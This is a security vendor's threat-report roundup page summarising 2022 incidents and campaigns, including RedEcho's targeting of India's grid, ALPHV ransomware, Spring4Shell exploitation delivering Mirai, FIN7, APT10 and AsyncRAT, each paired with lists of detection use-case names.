Microsoft reports on lessons learned during the first four months of the Russia and Ukraine cyber war. Russia has been observed to increase intelligence activities against Ukrainian allies with the goal to collect sensitive information from NATO and Western powers.
The Anvilogic Threat Reports
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.
We are committed to (read more…)
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.
- Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
- Strategic: General information security news, for awareness
About the Team
The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.
Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.
Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:
- Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
- Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
- Reports Hot off the forge:
- Threat News Reports
- Trending Threat Reports
- Research Articles
If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at firstname.lastname@example.org.
Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.
If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: email@example.com
Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform
Rising since the second quarter of 2022, McAfee labs have observed an increase in the use of LNK (shortcut files) in attacks to deliver malware such as Emotet, Qakbot, IcedID and etc.
New information-stealing malware, META has been gaining popularity amongst cybercriminals. Research from SANS and BleepingComputer shares the malware has been distributed through malspam campaigns.
Potential Attack on Indian Electricity Grid by RedEcho
Industry: Critical Infrastructure | Level: Strategic | Source: RecordedFuture
Activity tracked by Recorded Future suspects a cyber attack was initiated by Chinese state-sponsored threat group, RedEcho, targeting India’s power grid. The attacks were specifically targeted in North India at seven Indian State Load Despatch Centres (SLDCs), to disrupt the flow and dispatch of electricity. Geographically the activity is near the border of Ladakh, the area is a focus of border conflict between India and China. An assessment from Recorded Future’s director Jonathan Condra offers the following on the intrusion activity “We believe that the targeting of the Indian power sector is likely for prepositioning purposes or intelligence collection with an eye towards having the capability to disrupt the Indian power sector in the event of kinetic conflict between China and India, and/or for signaling purposes to India – showcasing a capability for deterrence purposes. The targeting of the emergency system may be motivated by more traditional intelligence collection goals, but we cannot confirm at this time.”
ALPHV Ransomware Hits North Carolina A&T University
Industry: Education | Level: Strategic | Source: TheRecord
ALPHV/Blackcat ransomware has compromised North Carolina A&T University as the institution has appeared on the ransomware group’s victim site. The attack appeared to have occurred between March 7th to 11th, with the attacks taking advantage of the smaller staff during the university’s spring break vacation. As reported by The Record the attack inhibited network communications that include “wireless connections, Blackboard instruction, single sign-on websites, VPN, Jabber, Qualtrics, Banner Document Management and Chrome River. Some of the services are still down.” In addition, personal information was also compromised includes social security numbers, financial data, SQL and email database information. The university is still recovering from the attack with services slowly being restored however the impact has affected students as some are unable to complete class assignments or participate in class with sessions being canceled due to the ongoing issues.
Nordex Group’s Cyber Attack
Industry: Manufacturing | Level: Strategic | Source: Nordex
The Nordex Group a wind turbine manufacturer headquartered in Germany suffered a cyberattack on March 31st, 2022 resulting in the “precautionary” shut down of their IT systems in various locations. The company maintains factories in Germany, China, Mexico, the United States, Brazil, Spain and India, with no details on the locations impacted. The company’s press statement states the intrusion activity was in the “early stage.” Adding that their incident response procedures were executed immediately, “The incident response team of internal and external security experts has been set up immediately in order to contain the issue and prevent further propagation and to assess the extent of potential exposure.” Nordex Group has not released any additional updates regarding the incident.
Cado Security reports of Denonia, a new malware identified to target AWS Lambda deploying cryptominers. The Lambda components of the malware were observed during dynamic analysis, as when its execution failed, it prompted AWS Lambda environment variables.
Industry: N/A | Level: Tactical | Source: Trend Micro
Trend Micro research has kept track of exploits for Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Functions (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a webshell to download Mirai botnet malware. Following a permission change with chmod from the downloading malware, it is then executed. Lastly, a shell script executes to download binaries from an attacker-owned server, to install compatible versions of Mirai samples with different CPU architectures onto the victim host.
- Anvilogic Scenario: Unix File Download, Modified, Executed
- Anvilogic Use Cases:
- Spring4Shell – CVE-2022-22965
- Spring-Cloud-Function – CVE-2022-22963
- Potential Web Shell
- File Download (Unix)
- File Modified for Execution
- File Execution (Unix)
- Rare shell script execution
Mandiant’s Research of FIN7
Industry: Financial Services, Food, Medical, Technology, Transportation, Utilities | Level: Tactical | Source: Mandiant
Mandiant provided updated research tracking the evolution of threat activity from threat group FIN7 between late 2021 to early 2022. The threat group has many associations with overlaps in many ransomware operations including Maze, Darkside, Blackmatter and ALPHV/Blackcat. Added by Mandiant, activity linking FIN7 and ransomware is identified though “Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time.” A variety of industries are targeted by FIN7 including financial services, food, medical, technology, transportation, and utilities. Activity associated with FIN7 is abundant and Mandiant has been tracking multiple UNCs (Uncategorized threat groups), appearing to be affiliated with FIN7. The threat group has continuously refined its arsenal, for example, their PowerShell backdoor called PowerPlant has gone through multiple iterations since 2022 and has been observed more frequently in newer intrusions as opposed to older malware such as LOADOUT and/or GRIFFON.
- Anvilogic Use Cases:
- Suspicious Executable by CMD.exe
- Windows Admin$ Share Access
- Windows Service Created
- Executable Process from Suspicious Folder
- Common Reconnaissance Commands
- RDP Connection
- RDP Logon/Logoff Event
- Rundll32 Command Line
- Create/Add Local/Domain User
- Query Registry
APT10/Cicada Espionage Attacks
Industry: Government, Legal, Non-Governmental Organizations (NGOs), Pharmaceutical, Religious, Telecommunications | Level: Tactical | Source: Symantec
Symantec has been tracking an espionage campaign spanning over the course of several months (earliest sign mid-2021), tied to the Chinese APT group, APT10 (aka Cicada, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.) The APT group has previously targeted Japanese-linked companies, however recently they have expanded their attacks globally including Europe, Asia, and North America. Entities targeted by the group include government, legal, religious, and non-governmental organizations (NGOs) however, current campaign appears to have a focus on government and NGO entities. Previously, APT10 has focused primarily on Japanese companies however, in the present campaign, only one victim in Japan was identified. Techniques used in the threat campaign have involved exploiting Microsoft Exchange Servers for initial access with various tools used during the attack phase including WinRAR for data archival, Mimikatz, WMIExec, NBTScan, and the group’s custom tool Sodamaster. The tool Sodamaster is capable of evading sandbox checks, host enumeration, and downloading additional payloads.
- Anvilogic Use Cases:
- Common Reconnaissance Commands
- Utility Archive Data
- Wscript/Cscript Execution
- WinRM Tools
- Query Registry
New AsyncRAT & 3LOSH Crypter Malware Campaigns
Industry: N/A | Level: Tactical | Source: Cisco Talos
Cisco Talos’s latest research tracking malware distribution campaigns have identified the usage of 3LOSH crypter to obfuscate the deployment of commodity malware including AsyncRAT and LimeRAT. An ISO disk image initiates the infection chain with a VBScript that launches PowerShell to create and execute a series of scripts. Persistence is achieved through a scheduled task that’s created by the PowerShell script. Once the series of bat and ps1 scripts have been completed, the payload for the remote access trojan is injected and executed. These campaigns with 3LOSH crypter have been observed by Cisco Talos for several months and appear to be increasing activity with attackers turning to 3LOSH crypter to evade detection in corporate environments.
Malwarebytes provided analysis on Colibri Loader, a malware that emerged in underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.“